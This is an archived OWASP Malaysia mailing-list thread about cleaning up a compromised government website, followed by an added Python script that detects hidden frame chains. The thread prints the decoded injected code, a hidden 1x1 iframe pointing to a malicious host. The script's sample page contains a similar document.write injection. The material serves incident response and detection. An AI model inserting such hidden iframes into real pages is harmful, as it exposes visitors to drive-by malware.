[Owasp-Malaysia] Malware Detected!

Sharuzzaman Ahmat Raslan sharuzzaman at gmail.com
Tue Feb 8 20:45:27 EST 2011


Please check how the line got injected into your system.

You need to find the source of the problem to make sure it will not happen
again.



On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <msyamsuri at gmail.com> wrote:

> Mr Adnan, thanks for the info and guide..
>
> I have cleaned up all the mess and the site is up and running again..
>
> thanks to all too..
>
> ** I will blog this so others can use it as a guide...
>
>
> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor <
> adnan.shukor at gmail.com> wrote:
>
>> mamp <= LOL typo.. it should be nano
>> js <= one of the binaries in SpiderMonkey. Get the patched version
>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
>> working on MacOS/Darwin, apply this patch
>>
>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
>>
>> thanks
>>
>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
>> <sharuzzaman at gmail.com> wrote:
>> > I can see 2 interesting apps/scripts:
>> >
>> > 1. mamp
>> > 2. /opt/analysis/js/js
>> >
>> > care to share? hopefully it is open source ;)
>> >
>> >
>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
>> > <adnan.shukor at gmail.com> wrote:
>> >>
>> >> Here is my bash history:
>> >>
>> >> xanda:tmp adnan$ history
>> >> <snip>
>> >>  500  cd /tmp
>> >>  501  wget http:/www2.pkink.gov.my/indexsedc.php
>> >>  502  wget http://www2.pkink.gov.my/indexsedc.php
>> >>  503  nano indexsedc.php
>> >>  504  wget http://www2.pkink.gov.my/indexsedc.php
>> >>  505  mamp indexsedc.php.1
>> >>  506  nano indexsedc.php.1
>> >>  507  wget http://www2.pkink.gov.my/sedc.php
>> >>  508  nano sedc.php
>> >>  509  wget http://www2.pkink.gov.my/default.php
>> >>  510  nano default.php
>> >>  511  nano default.php
>> >>  512  clear
>> >> <I've removed the tags and left the clean JavaScript inside>
>> >>  513  mv default.php default.txt
>> >>  514  /opt/analysis/js/js < default.txt
>> >>  515  cat write.log
>> >>  516  history
>> >> xanda:tmp adnan$
>> >>
>> >> Below is the output of the cat:
>> >> [output]
>> >> xanda:tmp adnan$ cat write.log
>> >> <iframe width="1" height="1" src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"<iframe
>> >> width="1" height="1" src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"
>> >> [/output]
>> >>
>> >>
>> >> Hint: you might use a modified version of SpiderMonkey to 'understand'
>> >> the JavaScript
>> >>
>> >> Thanks
>> >>
>> >> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> >> > thanks for the info..
>> >> > I will check all the files.
>> >> >
>> >> > How did you find it?
>> >> >
>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>> >> > <adnan.shukor at gmail.com> wrote:
>> >> >>
>> >> >> Here is the flow:
>> >> >>
>> >> >> 1) your indexsedc.php has an iframe to sedc.php
>> >> >> 2) and your sedc.php has an iframe to default.php
>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
>> >> >> actually create an iframe to
>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> >>
>> >> >> thanks :)
>> >> >>
>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> >> >> > can you point...
>> >> >> > my index.htm or indexsedc.php or other file?
>> >> >> >
>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>> >> >> > <adnan.shukor at gmail.com> wrote:
>> >> >> >>
>> >> >> >> you have iframe pointed to
>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> >> >>
>> >> >> >> which is not xss :)
>> >> >> >>
>> >> >> >> From my personal point of view, it's either caused by:
>> >> >> >> 1) malware on pc which has been used for ftp/access to the server
>> >> >> >> 2) compromised server
>> >> >> >>
>> >> >> >> you can send your access.log to cyber999 at cybersecurity.my or
>> >> >> >> mycert at mycert.org.my for further analysis :)
>> >> >> >>
>> >> >> >> thanks
>> >> >> >>
>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> >> >> >> > I have checked it.
>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <rastaboyz at gmail.com> wrote:
>> >> >> >> >>
>> >> >> >> >> Hi Mohd Syamsuri,
>> >> >> >> >>
>> >> >> >> >> Why don't you check on the reason why it's being blocked, it might
>> >> >> >> >> help.
>> >> >> >> >>
>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>> >> >> >> >>
>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>> >> >> >> >>
>> >> >> >> >> Regards,
>> >> >> >> >> Kishur
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> >> >> >> >>>
>> >> >> >> >>> Assalamualikum and good day to my fellow friends.
>> >> >> >> >>> I need some advice.
>> >> >> >> >>> The web site of Perbadanan kemajuan Iktisad Negeri Kelantan
>> >> >> >> >>> (http://www.pkink.gov.my) has been blocked by Google for almost 4 days.
>> >> >> >> >>> It said that we host malware on our server: Malware Detected! (Google said that!!)
>> >> >> >> >>> What I did is..
>> >> >> >> >>> 1. Scan all the data and upload new data
>> >> >> >> >>> 2. Check the index.html or index.php
>> >> >> >> >>> 3. Scan using a web scanner at
>> >> >> >> >>> http://www.avgthreatlabs.com/
>> >> >> >> >>> http://www.virustotal.com
>> >> >> >> >>> but we still get blocked..
>> >> >> >> >>> Google said Suspected injected code
>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php" NAME="confcontent" scrolling=yes >
>> >> >> >> >>> I have been using this code for almost 2 years
>> >> >> >> >>> What should I do now?
>> >> >> >> >>>
>> >> >> >> >>> --
>> >> >> >> >>> best regard
>> >> >> >> >>> syamsuri
>> >> >> >> >>>
>> >> >> >> >>>
>> >> >> >> >>>
>> >> >> >> >>> _______________________________________________
>> >> >> >> >>> Owasp-Malaysia mailing list
>> >> >> >> >>> Owasp-Malaysia at lists.owasp.org
>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >> >> >>>
>> >> >> >> >>> OWASP Malaysia Wiki
>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
>> >> >> >> >>>
>> >> >> >> >>> OWASP Malaysia Wiki Facebook
>> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >> >> >
>> >> >> >> >
>> >> >> >> >
>> >> >> >> > --
>> >> >> >> > best regard
>> >> >> >> > syamsuri
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> > --
>> >> >> > best regard
>> >> >> > syamsuri
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > best regard
>> >> > syamsuri
>> >
>> >
>> >
>> > --
>> > Sharuzzaman Ahmat Raslan
>
>
>
> --
> best regard
> syamsuri



-- 
Sharuzzaman Ahmat Raslan
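The injection Adnan traced above is a chain of frames (indexsedc.php -> sedc.php -> default.php -> a JavaScript-written 1x1 iframe to a third-party host). The script below is an added example, not code from the thread or the tools it mentions: it walks such a chain statically over a constructed in-memory copy of a site and flags frames that leave the site's own hosts or are sized to be invisible. All file names, hosts and page bodies are constructed for illustration.

```python
# Added example (not from the thread): statically walk frame/iframe chains of
# the shape described in the thread (index -> indexsedc.php -> sedc.php ->
# default.php -> 1x1 iframe written by JavaScript). Everything below is constructed.
import re
from urllib.parse import urlparse

SAMPLE_SITE = {  # constructed sample site: path -> page source
    "index.htm": '<FRAME SRC="http://www2.example.gov/indexsedc.php" NAME="confcontent" scrolling=yes >',
    "indexsedc.php": '<html><body><iframe src="sedc.php" width="100%"></iframe></body></html>',
    "sedc.php": "<p>News</p><iframe src='default.php'></iframe>",
    "default.php": "<p>ok</p><script>document.write('<iframe width=\"1\" height=\"1\" "
                   "src=\"http://bad.example.test/payload==\"></iframe>');</script>",
}
TRUSTED_HOSTS = {"www2.example.gov", "www.example.gov"}  # constructed: the site's own hosts

FRAME_RE = re.compile(r"<i?frame\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def frames(html):
    """Attribute dicts of every <frame>/<iframe> carrying a src, including tags
    hidden inside document.write('...') strings (escaped quotes are unescaped)."""
    found = []
    for m in FRAME_RE.finditer(html.replace("\\'", "'").replace('\\"', '"')):
        attrs = {k.lower(): a or b or c for k, a, b, c in ATTR_RE.findall(m.group(1))}
        if "src" in attrs:
            found.append(attrs)
    return found

def follow_chain(site, start, trusted):
    """Walk frame sources from `start`; return (page, src, reason) for frames
    that leave the trusted hosts or are sized to be invisible (0/1 px)."""
    findings, seen, stack = [], set(), [start]
    while stack:
        page = stack.pop()
        if page in seen:  # cycles (a.php <-> b.php) terminate here
            continue
        seen.add(page)
        for a in frames(site.get(page, "")):
            url = urlparse(a["src"])
            reasons = []
            if url.netloc and url.netloc not in trusted:
                reasons.append("external host")
            if a.get("width") in ("0", "1") and a.get("height") in ("0", "1"):
                reasons.append("1x1 hidden")
            if reasons:
                findings.append((page, a["src"], ", ".join(reasons)))
            if not url.netloc or url.netloc in trusted:  # only walk our own pages
                stack.append(url.path.lstrip("/"))
    return findings

if __name__ == "__main__":
    print(*follow_chain(SAMPLE_SITE, "index.htm", TRUSTED_HOSTS), sep="\n")
```

To run it against a real web root, replace SAMPLE_SITE with a dict built from the files on disk and TRUSTED_HOSTS with the site's own hostnames.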